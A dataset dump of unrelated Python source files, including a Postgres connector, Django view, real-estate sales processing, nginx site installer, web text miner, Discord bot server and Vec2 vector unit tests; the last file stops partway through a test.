class PostgresConfig(BasicSQLAlchemyConfig):
# defaults
scheme = "postgresql+psycopg2"
class PostgresSource(SQLAlchemySource):
def __init__(self, config, ctx):
super().__init__(config, ctx, "postgresql")
@classmethod
def create(cls, config_dict, ctx):
config = PostgresConfig.parse_obj(config_dict)
return cls(config, ctx)
| StarcoderdataPython |
1733942 | from app.Process.process_update import RequestsDataFile
from app.Process.process_quest import StatisticsSearch
class Startup:
def __init__(self):
self.datafile = RequestsDataFile()
self.search = StatisticsSearch()
def initial_menu(self):
print("--------- Sars-Cov-2 data analysis system ------------\n" \
" 1 - Update statistics data from the system\n" \
" 2 - Search methods in updated data\n")
option = int(input('Enter the desired action for the system: '))
if option == 1:
self.datafile.update_database_data()
else:
self.search.choose_type_archive()
self.search.method_menu()
| StarcoderdataPython |
1601264 | <filename>mysite/client/views.py
from django.http import HttpResponse
from django.shortcuts import render
# Create your views here.
# All Django wants returned is an HttpResponse. Or an exception.
def index(request):
# The code below loads the template called client/index.html
# and passes it a context.
# The context is a dictionary mapping template variable names to Python objects.
context = {}
# The render() function takes the request object as its first argument,
# a template name as its second argument
# and a dictionary as its optional third argument.
# It returns an HttpResponse object of the given template rendered with the given context.
return render(request, 'client/index.html', context) | StarcoderdataPython |
9684820 | <reponame>PhiladelphiaController/gun-violence
from .. import data_dir
from . import EPSG
from .core import geocode, Dataset
from .geo import *
from .fred import PhillyMSAHousingIndex
import os
from glob import glob
import pandas as pd
import geopandas as gpd
import numpy as np
try:
from phila_opa.db import OPAData00s
from phila_opa.select import residential
except:
OPAData00s = None
__all__ = ["ResidentialSales"]
def generate_sales_file(start_year=2006, end_year=2020, opa_data_dir=None):
"""
Generate a sales file of all unique sales occuring between the specified dates.
Notes
-----
This includes only residential sales.
"""
# initialize the database
if opa_data_dir is None:
opa_data_dir = "/Users/nicholashand/LocalWork/Data/OPA/"
if OPAData00s is None:
raise ValueError("sales file can only be generated on local machine")
db = OPAData00s(data_dir=opa_data_dir)
# do tax years 2006 through 2019
out = []
for tax_year in range(start_year, end_year + 1):
print(f"Processing tax year {tax_year}...")
df = db.load_tax_year(tax_year, geocode=tax_year < 2020)
out.append(residential(df))
# concatenate, only keeping overlapping columns
out = pd.concat(out, axis=0, join="inner")
print(" Total number of sales = ", len(out))
# sort by tax_year, smallest to largest
out = out.sort_values(by="tax_year", ascending=True)
# remove duplicates
out = out.drop_duplicates(
subset=["parcel_number", "sale_date", "sale_price"], keep="first"
)
print(" Number of non-duplicated sales = ", len(out))
# output directory
dirname = os.path.join(data_dir, "OPA")
if not os.path.exists(dirname):
os.makedirs(dirname)
# save!
path = os.path.join(dirname, f"sales_file_{start_year}_to_{end_year}.csv")
out.to_csv(path, index=False)
return out
def generate_value_added_sales_by_year(start_year=2006, end_year=2018):
"""
Generate the sales files by year with value-added columns.
Notes
-----
This takes the file of unique sales and adds several useful columns, including
indexed housing prices and geocoded fields (zip codes, neighborhoods, and
police districts).
"""
# get the main sales file
matches = glob(os.path.join(data_dir, "OPA", "sales_file_*.csv"))
if not len(matches):
sales_data = generate_sales_file()
else:
sales_data = pd.read_csv(matches[0])
# format the data
sales_data = (
sales_data.assign(
sale_date=lambda df: pd.to_datetime(df["sale_date"]),
sale_year=lambda df: df.sale_date.dt.year,
sale_price_psf=lambda df: df.sale_price / df.total_livable_area,
test=lambda df: ~np.isinf(df.sale_price_psf) & df.sale_price_psf.notnull(),
housing_index=lambda df: PhillyMSAHousingIndex.interpolate(df["sale_date"]),
)
.assign(
housing_index=lambda df: df.housing_index / df.housing_index.max(),
sale_price_indexed=lambda df: df.sale_price / df.housing_index,
)
.query("test == True")
.drop(labels=["test"], axis=1)
)
# make sure the output directory exists
dirname = os.path.join(data_dir, "OPA", "ValueAdded")
if not os.path.exists(dirname):
os.makedirs(dirname)
# geocode!
zip_codes = ZIPCodes.get()
neighborhoods = Neighborhoods.get()
police_districts = PoliceDistricts.get()
# save each year
for year in range(start_year, end_year + 1):
print(f"Processing sale year {year}...")
# get this year's data
df = sales_data.query("sale_year == @year")
# convert to geopandas
gdf = (
gpd.GeoDataFrame(
df,
geometry=gpd.points_from_xy(
df["lng"].astype(float), df["lat"].astype(float)
),
crs={"init": "epsg:4326"},
)
.to_crs(epsg=EPSG)
.drop(labels=["lat", "lng"], axis=1)
)
if "zip_code" in gdf.columns:
gdf = gdf.drop(labels=["zip_code"], axis=1)
# geocode
gdf = (
gdf.pipe(geocode, zip_codes)
.pipe(geocode, neighborhoods)
.pipe(geocode, police_districts)
)
path = os.path.join(dirname, f"{year}.csv")
gdf.to_csv(path, index=False)
def _get_IQR_limits(df, column, iqr_factor=1.5):
assert column in df.columns
# compute the inter quartile ratio
Q1 = df[column].quantile(0.25)
Q3 = df[column].quantile(0.75)
IQR = Q3 - Q1
# trim by lower and upper bounds
lower = Q1 - iqr_factor * IQR
upper = Q3 + iqr_factor * IQR
return lower, upper
def _remove_outliers(df, column, iqr_factor=1.5):
lower, upper = _get_IQR_limits(df, column, iqr_factor=iqr_factor)
return df.query("@lower < %s <= @upper" % column)
class ResidentialSales(Dataset):
"""
Data for residential sales from 2006 to 2018, extracted from the OPA
annual certified assessments.
Notes
-----
These are trimmed to remove outliers on an annual basis using 1.5 times
the interquartile range (IQR).
"""
compress = True
date_columns = ["sale_date"]
@classmethod
def download(cls, **kwargs):
files = glob(os.path.join(data_dir, "OPA", "ValueAdded", "*.csv"))
out = []
for f in files:
# load the data
df = (
pd.read_csv(f, low_memory=False)
.query("sale_price > 1")
.assign(
sale_date=lambda df: pd.to_datetime(df.sale_date).dt.tz_localize(
"UTC"
),
ln_sale_price=lambda df: np.log(df.sale_price),
ln_sale_price_indexed=lambda df: np.log(df.sale_price_indexed),
is_condo=lambda df: df.parcel_number.astype(str).str.startswith(
"888"
),
time_offset=lambda df: (
df.sale_date - pd.to_datetime("1/1/2006").tz_localize("UTC")
)
.dt.total_seconds()
.values,
)
.pipe(_remove_outliers, "ln_sale_price")
)
out.append(df)
return (
pd.concat(out)
.sort_values("sale_date", ascending=False)
.reset_index(drop=True)
)
| StarcoderdataPython |
4813983 | import os
import sys
from dotenv import load_dotenv
from mitto_sdk import Mitto
load_dotenv()
BASE_URL = os.getenv("MITTO_BASE_URL")
API_KEY = os.getenv("MITTO_API_KEY")
JOB = {
"name": "sql_select_1_from_api",
"title": "[SQL] Select 1 from API",
"type": "sql",
"tags": [
"sql"
],
"conf": {
"dbo": "postgresql://localhost/analytics",
"sql": "select 1;",
"parameters": {},
"kwargs": {},
"transaction": True,
"split": False
}
}
def main():
mitto = Mitto(
base_url=BASE_URL,
api_key=API_KEY
)
job = mitto.create_job(job=JOB)
print(job)
if __name__ == "__main__":
sys.exit(main())
| StarcoderdataPython |
233055 | <gh_stars>0
from os import environ as env
import os
import network
import certs
def get_path(website_id):
return os.path.abspath(f"{env['NGINX_SITES_DIR']}/website_{website_id}.conf")
def deal_with_certs(website_id, domain):
if certs.has_certs(website_id, domain):
certs.copy_certs(website_id, domain) # just in case
print("Website already has certs")
return True
else:
print("Website does not have certs, generating..")
certs.get_cert(website_id, domain)
if certs.has_certs(website_id, domain):
print("it worked!")
# epic.
certs.copy_certs(website_id, domain)
return True
else:
print("it did not work.")
# :(
return False
def install(website_id, domain, use_https):
if use_https:
# turn off use_https if cert fails
use_https = deal_with_certs(website_id, domain)
ip_addr = network.get_webserver_ip(website_id)
dest_path = get_path(website_id)
if use_https:
with open('nginx-template-https.conf', 'r') as file:
data = file.read()
else:
with open('nginx-template.conf', 'r') as file:
data = file.read()
data = data.replace('REPLACEME_DOMAIN', domain)
data = data.replace('REPLACEME_IPADDR', ip_addr)
with open(dest_path, 'w') as dest_file:
dest_file.write(data)
reload_nginx()
def uninstall(website_id):
path = get_path(website_id)
if os.path.exists(path):
os.remove(path)
reload_nginx()
def reload_nginx():
if 'NGINX_RELOAD_COMMAND' in env:
command = env['NGINX_RELOAD_COMMAND']
os.system(command)
| StarcoderdataPython |
1838262 | #*****************************************************#
# This file is part of GRIDOPT. #
# #
# Copyright (c) 2015-2017, <NAME>. #
# #
# GRIDOPT is released under the BSD 2-clause license. #
#*****************************************************#
import os
import csv
from os import listdir
from os.path import join
DIR_CASES = join('.', 'tests', 'resources', 'cases')
DIR_PFSOL = join('.', 'tests', 'resources', 'pf_solutions')
test_cases = [join(DIR_CASES, f) for f in listdir(DIR_CASES)]
test_cases.sort()
def get_pf_solution_file(case_file, dir, sol):
"""
Gets power flow solution file path.
Parameters
----------
case_file : path to case file (string)
dir : path to solution file directory (string)
sol : solution code extension (string)
Returns
-------
sol_file : path to solution file (string)
"""
return join(dir, case_file.split(os.sep)[-1]+'.'+sol)
def read_pf_solution_file(sol_file):
"""
Reads contents of power flow solution file.
Parameters
----------
sol_file : path to solution file.
Returns
-------
sol_data : solution data (dictionary)
"""
try:
bus_data = {}
sol_data = {'v_mag_tol': 0.,
'v_ang_tol': 0.,
'bus_data': bus_data}
f = open(sol_file)
reader = csv.reader(f,delimiter=',')
v_mag_tol,v_ang_tol = list(map(float,next(reader)))
sol_data['v_mag_tol'] = v_mag_tol
sol_data['v_ang_tol'] = v_ang_tol
next(reader) # header
for row in reader:
bus_number,code,v_mag,v_ang = int(row[0]),int(row[1]),float(row[2]),float(row[3])
bus_data[bus_number] = {'v_mag': v_mag, # p.u.
'v_ang': v_ang} # degrees
return sol_data
except IOError:
return None
| StarcoderdataPython |
4944133 | from BeautifulSoup import BeautifulSoup
from collections import defaultdict
import re
import hashlib
import json
import nltk
import sys
from datetime import datetime
import urllib
import urllib2
from threading import Thread
import extract
import operator
from BeautifulSoup import BeautifulSoup
class WebsiteMiner(Thread):
def __init__(self, category):
super(WebsiteMiner, self).__init__()
self.category = category
self.mined_posts_hashes = []
def run(self):
self.log("Starting mining.")
urls = self.category.urls.split(',')
for url in urls:
try:
visible_text, last_modified = self.download_page(url)
text_hash = hashlib.sha1(visible_text.encode('utf-8'))
if text_hash not in self.mined_posts_hashes:
terms_dict = extract.extract_terms(visible_text)
now = datetime.now().strftime('%Y%m%d%H%M')
time = last_modified.strftime('%Y%m%d%H%M')
post = WebsiteMiner.dict_of_post(url, terms_dict, time, now)
batch = WebsiteMiner.package_batch_to_json(self.category.id, [post])
self.send_to_parent(self.category.parent_id, batch)
self.mined_posts_hashes.append(hash)
else:
print("Post already mined.")
except Exception as e:
print e.message, e.args
def stop(self):
self.log("Stopping mining.")
def log(self, text):
print "Miner:{} - {}".format(self.category.id, text)
# website specific static methods
def download_page(self, uri):
try:
res = urllib.urlopen(uri)
info = dict(res.info())
time = datetime.now()
if 'last-modified' in info:
time_str = info['last-modified']
time = datetime.strptime(time_str, '%a, %d %b %Y %H:%M:%S %Z')
html = res.read()
soup = BeautifulSoup(html)
text = self.find(soup, 'p') \
+ self.find(soup, 'h1') \
+ self.find(soup, 'h2') \
+ self.find(soup, 'h3')
return text, time
except:
print "Error loading " + uri, sys.exc_info()
return ""
def find(self, soup, tag):
elements = soup.findAll(tag)
lines = [e.text for e in elements if len(e.text) > 0]
return ' '.join(lines)
# standard engine communication static methods
@staticmethod
def send_to_parent(url, data):
url += "/v1/minerpost"
req = urllib2.Request(url, data, {'Content-Type': 'application/json'})
try:
urllib2.urlopen(req)
except Exception as e:
print "Exception while sending data to engine at the uri: {}".format(url)
print e
@staticmethod
def dict_of_post(post_url, terms_dict, last_modified, mined_at):
post = {
"terms": terms_dict,
"url": post_url,
"datetime": last_modified,
"mined_at": mined_at
}
return post
@staticmethod
def package_batch_to_json(id_of_miner, posts):
values = {
"posts": posts,
"miner_id": id_of_miner
}
data = json.dumps(values)
return data
| StarcoderdataPython |
3553481 | <reponame>mattjudge/field-photogrammetric-reconstruction
"""
Author: <NAME> 2017, except `set_axes_equal`
This module provides:
:class:`Pointcloud` as a container for point clouds and associated projection matrices
:func:`align_points_with_xy` to align point clouds on the XY plane
:func:`visualise_heatmap` to interpolate and render pre-binned point clouds
"""
import logging
import os
import errno
import numpy as np
from mpl_toolkits.mplot3d import Axes3D
from matplotlib import cm
import matplotlib.pyplot as plt
from scipy import interpolate, ndimage
from scipy.io import savemat
class PointCloud:
def __init__(self, points, imageshape, P1, P2, R, t):
"""
Container for a point cloud and related projection matrices
:param points: A 3xN homogeneous array of [X, Y, Z]^T points in 3D space
:param imageshape: The (y,x) image shape from which the points were obtained
:param P1: The projection matrix of the first frame camera
:param P2: The projection matrix of the second frame camera
:param R: The rotation mapping the first camera to the second, followed by translation t
:param t: The translation mapping the first camera to the second after rotation R
"""
assert points.shape == (3, np.product(imageshape)) # check dimensions
self.points = points
self.imageshape = imageshape
self.P1 = P1
self.P2 = P2
self.R = R
self.t = t
def get_shaped(self):
"""
:return: A [Y,X,3] array of self.points reshaped into self.imageshape
"""
return np.dstack([
self.points[0, :].reshape(self.imageshape),
self.points[1, :].reshape(self.imageshape),
self.points[2, :].reshape(self.imageshape)
])
def align_points_with_xy(points):
"""
Applies rotation and translation to align point cloud with the xy plane
Maths Ref: http://math.stackexchange.com/questions/1167717/transform-a-plane-to-the-xy-plane
:param points: [3,N] numpy array of points to align
:return: [3,N] numpy array of aligned points
"""
notnan_points = points[:, ~np.isnan(points[-1,:])]
a = np.hstack((notnan_points[:-1, :].T, np.ones((notnan_points.shape[1], 1))))
c, _, _, _ = np.linalg.lstsq(a, notnan_points[2, :])
centroid = np.median(notnan_points, axis=1, keepdims=True)
logging.info("Centroid: {}".format(centroid))
cos_t = 1 / np.sqrt(c[0] ** 2 + c[1] ** 2 + 1)
sin_t = np.sin(np.arccos(cos_t))
ux = cos_t * -c[1]
uy = cos_t * c[0]
n = np.sqrt(ux ** 2 + uy ** 2)
ux /= n
uy /= n
R = np.array([
[cos_t + ux ** 2 * (1 - cos_t), ux * uy * (1 - cos_t), uy * sin_t],
[ux * uy * (1 - cos_t), cos_t + uy ** 2 * (1 - cos_t), -ux * sin_t],
[-uy * sin_t, ux * sin_t, cos_t]
])
return R.dot(points - centroid)
def set_axes_equal(ax):
"""
Make axes of 3D plot have equal scale so that spheres appear as spheres,
cubes as cubes, etc.. This is one possible solution to Matplotlib's
ax.set_aspect('equal') and ax.axis('equal') not working for 3D.
Ref: http://stackoverflow.com/a/31364297
:param ax: a matplotlib axis, e.g., as output from plt.gca().
:return: None
"""
x_limits = ax.get_xlim3d()
y_limits = ax.get_ylim3d()
z_limits = ax.get_zlim3d()
x_range = abs(x_limits[1] - x_limits[0])
x_middle = np.mean(x_limits)
y_range = abs(y_limits[1] - y_limits[0])
y_middle = np.mean(y_limits)
z_range = abs(z_limits[1] - z_limits[0])
z_middle = np.mean(z_limits)
# The plot bounding box is a sphere in the sense of the infinity
# norm, hence I call half the max range the plot radius.
plot_radius = 0.5*max([x_range, y_range, z_range])
ax.set_xlim3d([x_middle - plot_radius, x_middle + plot_radius])
ax.set_ylim3d([y_middle - plot_radius, y_middle + plot_radius])
ax.set_zlim3d([z_middle - plot_radius, z_middle + plot_radius])
def _make_dir_for_file(fpath):
"""
Helper function to ensure the path to a file exists and if not, create the required folder structure
:param fpath: Path to file
"""
try:
os.makedirs(os.path.dirname(fpath))
except OSError as e:
if e.errno != errno.EEXIST:
raise
def visualise_heatmap(points, path=None, detail=30, gsigma=0, scale=1, mode='standard'):
"""
Interpolates a point cloud into a regular grid, rendering a heatmap and optionally saving as .png and .mat files.
The .mat file can be further processed by external tools into a surface plot.
:param points: A [3,N] numpy array of points
:param path: The path in which to save output files. No files will be saved if set to None.
:param detail: The detail with which to interpolate the point cloud
:param gsigma: The level of gaussian smoothing to apply (default to 0, no smoothing)
:param scale: Scale to apply to the 3 axis, defaults to 1
:param mode: Either 'standard' or 'cutthru'.
'standard': Render a standard heatmap
'cutthru': Include two cross sectional lines
:return:
"""
pts = points[:, ~np.isnan(points[-1, :])]
xmin, ymin, zmin = np.floor(np.min(pts, axis=1)).astype(int)
xmax, ymax, zmax = np.ceil(np.max(pts, axis=1)).astype(int)
logging.info("data shape: {}".format(pts.shape))
logging.info("data min : {}".format(np.min(pts, axis=1)))
logging.info("data max : {}".format(np.max(pts, axis=1)))
xarr, yarr = np.arange(xmin, xmax, 1 / detail), np.arange(ymin, ymax, 1 / detail)
X, Y = np.meshgrid(xarr, yarr)
logging.info("X shape: {}".format(X.shape))
logging.info("Y shape: {}".format(Y.shape))
print("Interpolating Z")
Z = -interpolate.griddata(np.vstack([pts[0, :], pts[1, :]]).T, pts[2, :].T,
np.vstack([X.flatten(), Y.flatten()]).T, method='linear'
).reshape(X.shape)
logging.info("Z shape: {}".format(Z.shape))
if gsigma > 0:
Z = ndimage.gaussian_filter(Z, sigma=gsigma, order=0)
logging.info("Final Z shape: {}".format(Z.shape))
print("Rendering")
# scale XYZ
X /= scale
Y /= scale
Z /= scale
if mode == 'standard':
fig = plt.figure()
ax = fig.gca()
p = plt.imshow(Z, cmap='gray', # cmap='hot',
extent=(np.min(X), np.max(X), np.max(Y), np.min(Y)),
interpolation='nearest', aspect='equal', origin='upper') # set the aspect ratio to auto to fill the space.
ax.set_xlabel('x [m]')
ax.set_ylabel('y [m]')
cb = fig.colorbar(p)
cb.set_label('Crop height deviation (z) [m]')
elif mode == 'cutthru':
# create a 2 X 2 grid
# gs = grd.GridSpec(3, 2, height_ratios=[6, 1, 1], width_ratios=[10, 1], wspace=0.2)
fig, axes = plt.subplots(3, 2, sharex='col', subplot_kw=dict(),
gridspec_kw=dict(height_ratios=[4, 1, 1], width_ratios=[10, 1], wspace=0.2))
# image plot
ax = axes[0, 0]
p = ax.imshow(Z, cmap='gray',
extent=(np.min(X), np.max(X), np.max(Y), np.min(Y)),
interpolation='nearest', aspect='equal', origin='upper') # set the aspect ratio to auto to fill the space.
# ax.set_xlabel('x [m]')
ax.set_ylabel('y [m]')
rowA = -500
rowB = -200
ax.plot((np.min(X), np.max(X)), (Y[rowA, 0], Y[rowA, -1]), 'b-')
ax.plot((np.min(X), np.max(X)), (Y[rowB, 0], Y[rowB, -1]), 'r-')
# color bar in it's own axis
colorAx = axes[0, 1]
cb = plt.colorbar(p, cax=colorAx)
cb.set_label('Crop height deviation (z) [m]')
# line plot
ax2 = axes[1, 0]
ax2.spines['right'].set_visible(False)
ax2.spines['top'].set_visible(False)
ax2.xaxis.set_ticks_position('bottom')
ax2.yaxis.set_ticks_position('left')
# ax2.set_aspect('auto')
# ax2.set_xlabel('x [m]')
ax2.set_ylabel('z [m]')
ax2.set_xlim((np.min(X), np.max(X)))
ax2.plot(X[rowA, :], Z[rowA, :], "b-")
# line plot
ax3 = axes[2, 0]
ax3.spines['right'].set_visible(False)
ax3.spines['top'].set_visible(False)
ax3.xaxis.set_ticks_position('bottom')
ax3.yaxis.set_ticks_position('left')
ax3.set_xlabel('x [m]')
ax3.set_ylabel('z [m]')
ax3.set_xlim((np.min(X), np.max(X)))
ax3.plot(X[rowB, :], Z[rowB, :], "r-")
# hide unwanted
axes[1, 1].axis('off')
axes[2, 1].axis('off')
else:
raise ValueError('Unknown render mode')
if path is not None:
path = '{}_gsigma{}'.format(path, gsigma)
_make_dir_for_file(path)
fig.savefig('{}_mode{}.pdf'.format(path, mode), dpi=1000)
savemat('{}.mat'.format(path), {
'X': X,
'Y': Y,
'Z': Z
})
plt.show()
return fig
def _visualise_worlds_mplotlib(*worlds, method="surf", fname=None):
"""
Legacy function to produce a surface render using matplotlib
:param worlds:
:param method:
:param fname:
:return:
"""
fig = plt.figure()
ax = fig.gca(projection='3d')
ax.set_aspect('equal')
ax.set_xlabel('x')
ax.set_ylabel('y')
ax.set_zlabel('z')
if method == "surf":
if len(worlds) == 1:
shaped = worlds[0].get_shaped()
X, Y, Z = shaped[:, :, 0], shaped[:, :, 1], shaped[:, :, 2]
logging.info("Z range: {}, {}".format(np.nanmin(Z), np.nanmax(Z)))
surf = ax.plot_surface(X, Y, Z, cmap=cm.hot, linewidth=0, antialiased=False,
vmin=np.nanmin(Z), vmax=np.nanmax(Z)) # these limits seem to make it less
# sharp, but are required to deal with NaNs
surf.cmap.set_under('black')
fig.colorbar(surf, extend='both')
else:
for i, world in enumerate(worlds):
shaped = world.get_shaped()
X, Y, Z = shaped[:, :, 0], shaped[:, :, 1], shaped[:, :, 2]
surf = ax.plot_surface(X, Y, Z, linewidth=0, antialiased=False, rcount=10, ccount=10)#, color=('r','g','b','y')[i])
else:
# method == "scatter"
# requires heavy graphics
for world in worlds:
X, Y, Z = world.points
ax.scatter(X, Y, Z, linewidth=0, antialiased=False, marker="o")
set_axes_equal(ax)
if fname is not None:
_make_dir_for_file(fname)
plt.savefig(fname)
plt.show()
return plt
def _visualise_world_visvis(X, Y, Z, format="surf"):
"""
Legacy function to produce a surface render using visvis
:param X:
:param Y:
:param Z:
:param format:
"""
import visvis as vv
# m2 = vv.surf(worldx[::detail], worldy[::detail], worldz[::detail])
app = vv.use()
# prepare axes
a = vv.gca()
a.cameraType = '3d'
a.daspectAuto = False
# print("view", a.camera.GetViewParams())
# a.SetView(loc=(-1000,0,0))
# a.camera.SetView(None, loc=(-1000,0,0))
if format == "surf":
l = vv.surf(X, Y, Z)
a.SetLimits(rangeX=(-0.2, 0.2), rangeY=(-0.5, 0.5), rangeZ=(-0.5, 0), margin=0.02)
else:
# draw points
pp = vv.Pointset(np.concatenate([X.flatten(), Y.flatten(), Z.flatten()], axis=0).reshape((-1, 3)))
l = vv.plot(pp, ms='.', mc='r', mw='5', ls='', mew=0)
l.alpha = 0.2
app.Run()
| StarcoderdataPython |
3505536 | class C(tuple):
def __new__(cls, tpl, val):
print("C.__new__")
obj = tuple.__new__(cls, tpl)
#print("in new:", type(obj))
assert type(obj) is C
obj.val = val
return obj
o = C((1, 2), 3)
assert type(o) is C
print(o)
print(o.val)
print("--")
class C(tuple):
def __new__(cls, tpl, val):
print("C.__new__")
obj = super().__new__(cls, tpl)
#print("in new:", type(obj))
assert type(obj) is C
obj.val = val
return obj
o = C((1, 2), 3)
assert type(o) is C
print(o)
print(o.val)
| StarcoderdataPython |
8124444 | <reponame>DuckMcFuddle/forum-sweats
from aiohttp import web
from . import discordbot, commands
import asyncio
import os
routes = web.RouteTableDef()
@routes.get('/')
async def index(request):
return web.Response(text='e')
@routes.get('/kill')
async def kill_bot(request):
if request.query.get('token') == os.getenv('token'):
exit()
return web.Response(text='e')
@routes.get('/api/members')
async def api_members(request):
return web.json_response(discordbot.api_get_members())
def start_server(loop, background_task, client):
global app
asyncio.set_event_loop(loop)
app = web.Application(
)
app.discord = client
app.add_routes(routes)
asyncio.ensure_future(
background_task,
loop=loop
)
web.run_app(
app,
port=8081
)
| StarcoderdataPython |
11395799 | <reponame>TovarnovM/easyvec<filename>tests/test_vec2.py
from easyvec import Vec2
import numpy as np
from pytest import approx
def test_constructor1():
v = Vec2(1,2)
assert v is not None
assert v.x == approx(1)
assert v.y == approx(2)
def test_constructor2():
v = Vec2.from_list([1, 2])
assert v == (1, 2)
assert v.x == approx(1)
assert v.y == approx(2)
def test_constructor3():
v = Vec2.from_dict({'x': 1, 'y': 2})
assert v == (1, 2)
assert v.x == approx(1)
assert v.y == approx(2)
def test_cmp1():
from easyvec.vectors import get_CMP_TOL
v1 = Vec2(1,2)
v2 = Vec2(1 + get_CMP_TOL()/10, 2 + get_CMP_TOL()/10)
assert v1 == v2
def test_cmp2():
from easyvec.vectors import get_CMP_TOL
v1 = Vec2(1,2)
v2 = Vec2(1 + get_CMP_TOL()*2, 2 + get_CMP_TOL()/10)
assert (v1 == v2) == False
def test_cmp3():
from easyvec.vectors import get_CMP_TOL
v1 = Vec2(1,2)
v2 = Vec2(1 + get_CMP_TOL()*2, 2 + get_CMP_TOL()/10)
assert v1 != v2
def test_cmp4():
assert Vec2(-1, 1.11) == (-1, 1.11)
def test_cmp5():
assert Vec2(-1, 1.11) == [-1, 1.11]
def test_cmp6():
assert Vec2(-1, 1.11) != np.array([-1, 1.111])
def test_add1():
assert Vec2(2,3) + Vec2(3,2) == Vec2(5,5)
def test_add2():
assert Vec2(2,3) + (3,2) == Vec2(5,5)
def test_add3():
assert Vec2(2,3) + [3,2] == Vec2(5,5)
def test_add4():
import numpy as np
assert Vec2(2,3) + np.array([3,2]) == Vec2(5,5)
def test_add5():
assert Vec2(2,3) + 3 == Vec2(5,6)
def test_add6():
import numpy as np
assert [33,22] + Vec2(2,3) == Vec2(35,25)
def test_add7():
assert (3,2) + Vec2(2,3) == Vec2(5,5)
def test_add8():
import numpy as np
assert Vec2(5,5) == np.array([3,2]) + Vec2(2,3).as_np()
def test_add9():
assert 3 + Vec2(2,3) == Vec2(5,6)
def test_add10():
assert [33,22] + Vec2(2,3) == Vec2(35,25)
def test_unpack1():
x, y = Vec2(-7,8)
assert x == -7
assert y == 8
def test_unpack2():
def foo(x, y):
return x, y
x,y = foo(*Vec2(-7,8))
assert x == -7
assert y == 8
def test_unpack4():
def foo(x, y):
return x, y
x,y = foo(**Vec2(-7,8))
assert x == -7
assert y == 8
def test_sub1():
assert Vec2(1,2) - Vec2(3,5) == (-2, -3)
def test_sub2():
assert Vec2(1, 2) - (3, 5) == [-2, -3]
def test_sub3():
assert (1, 2) - Vec2(3, 5) == (-2, -3)
def test_sub4():
assert Vec2(3, 5) - [1, 6] == (2, -1)
def test_sub5():
assert [1, 6] - Vec2(3, 5) == (-2, 1)
def test_sub6():
import numpy as np
assert Vec2(1, 2) - np.array([3, 5]) == (-2, -3)
def test_sub7():
assert 6 - Vec2(3, 5) == (3, 1)
def test_sub8():
assert Vec2(3, 5) - 7 == (-4, -2)
def test_iadd1():
v = Vec2(1, 2)
v += Vec2(3, 5)
assert v == Vec2(4, 7)
def test_iadd2():
v = Vec2(1, 2)
v += (3, 5)
assert v == (4, 7)
def test_iadd3():
v = Vec2(1, 2)
v += 3
assert v == (4, 5)
def test_iadd4():
v = Vec2(1, 2)
v += [3, 10]
assert v == (4, 12)
def test_iadd5():
import numpy as np
v = Vec2(1, 2)
v += np.array([3, 10])
assert v == (4, 12)
def test_isub1():
v = Vec2(1, 2)
v -= Vec2(3, 5)
assert v == Vec2(-2, -3)
def test_isub2():
v = Vec2(1, 2)
v -= (3, 5)
assert v == (-2, -3)
def test_isub3():
v = Vec2(1, 2)
v -= 3
assert v == (-2, -1)
def test_isub4():
v = Vec2(1, 2)
v -= [3, 10]
assert v == [-2, -8]
def test_isub5():
import numpy as np
v = Vec2(1, 2)
v -= np.array([3, 10])
assert v == (-2, -8)
def test_mul1():
assert Vec2(1, 2) * 3 == (3,6)
def test_mul2():
assert Vec2(1, 2) * (2, -1) == approx(0)
def test_mul3():
assert Vec2(1, 2) * [2, -1] == approx(0)
def test_mul4():
assert Vec2(1, 2) * Vec2(2, -1) == approx(0)
def test_mul5():
import numpy as np
assert Vec2(1, 2) * np.array([2, -1]) == approx(0)
def test_mul11():
assert 3 * Vec2(1, 2) == (3,6)
def test_mul21():
assert (2, -1) * Vec2(1, 2) == approx(0)
def test_mul31():
assert [2, -1] * Vec2(1, 2) == approx(0)
def test_imul1():
v = Vec2(1, 2)
v *= Vec2(3, 5)
assert v == Vec2(3, 10)
def test_imul2():
v = Vec2(1, 2)
v *= (3, 5)
assert v == (3, 10)
def test_imul3():
v = Vec2(1, 2)
v *= 3
assert v == (3, 6)
def test_imul4():
v = Vec2(1, 2)
v *= [3, 10]
assert v == [3, 20]
def test_imul5():
import numpy as np
v = Vec2(1, 2)
v *= np.array([3, 10])
assert v == (3, 20)
def test_div1():
assert Vec2(3, 6) / 3 == (1,2)
def test_div2():
assert Vec2(10, 2) / (2, -1) == (5,-2)
def test_div3():
assert Vec2(10, 2) / [2, -1] == (5,-2)
def test_div4():
assert Vec2(10, 2) / Vec2(2, -1) == (5,-2)
def test_div5():
import numpy as np
assert Vec2(10, 2) / np.array([2, -1]) == (5,-2)
def test_div11():
assert 12 / Vec2(3, 4) == (4,3)
def test_div21():
assert (12, 8) / Vec2(3, 4) == (4,2)
def test_div31():
assert [12, 8] / Vec2(3, 4) == (4,2)
def test_idiv1():
v = Vec2(12, 10)
v /= Vec2(3, 5)
assert v == Vec2(4, 2)
def test_idiv2():
v = Vec2(12, 10)
v /= (3, 5)
assert v == (4, 2)
def test_idiv3():
v = Vec2(12, 15)
v /= 3
assert v == (4, 5)
def test_idiv4():
v = Vec2(12, 20)
v /= [3, 10]
assert v == [4, 2]
def test_idiv5():
import numpy as np
v = Vec2(12, 20)
v /= np.array([3, 10])
assert v == (4, 2)
def test_floordiv1():
assert Vec2(4, 8) // 3 == (1,2)
def test_floordiv2():
assert Vec2(11, 2.5) // (2, -1) == (5,-3)
def test_floordiv3():
assert Vec2(11, 2.5) // [2, -1] == (5,-3)
def test_floordiv4():
assert Vec2(11, 2.5) // Vec2(2, -1) == (5,-3)
def test_floordiv5():
import numpy as np
assert Vec2(11, 2.5) // np.array([2, -1]) == (5,-3)
def test_floordiv11():
assert 12 // Vec2(3, 4) == (4,3)
def test_floordiv21():
assert (13, 9) // Vec2(3, 4) == (4,2)
def test_floordiv31():
assert [13, 9] // Vec2(3, 4) == (4,2)
def test_ifloordiv1():
v = Vec2(13, 12)
v //= Vec2(3, 5)
assert v == Vec2(4, 2)
def test_ifloordiv2():
v = Vec2(13, 12)
v //= (3, 5)
assert v == (4, 2)
def test_ifloordiv3():
v = Vec2(13, 17)
v //= 3
assert v == (4, 5)
def test_ifloordiv4():
v = Vec2(13, 24)
v //= [3, 10]
assert v == [4, 2]
def test_ifloordiv5():
import numpy as np
v = Vec2(13, 24)
v //= np.array([3, 10])
assert v == (4, 2)
def test_mod1():
assert Vec2(4, 8) % 3 == (1,2)
def test_mod2():
assert Vec2(11, 2.1) % (2, -1) == (1,0.1)
def test_mod3():
assert Vec2(11, 2.9) % [2, -1] == (1,0.9)
def test_mod4():
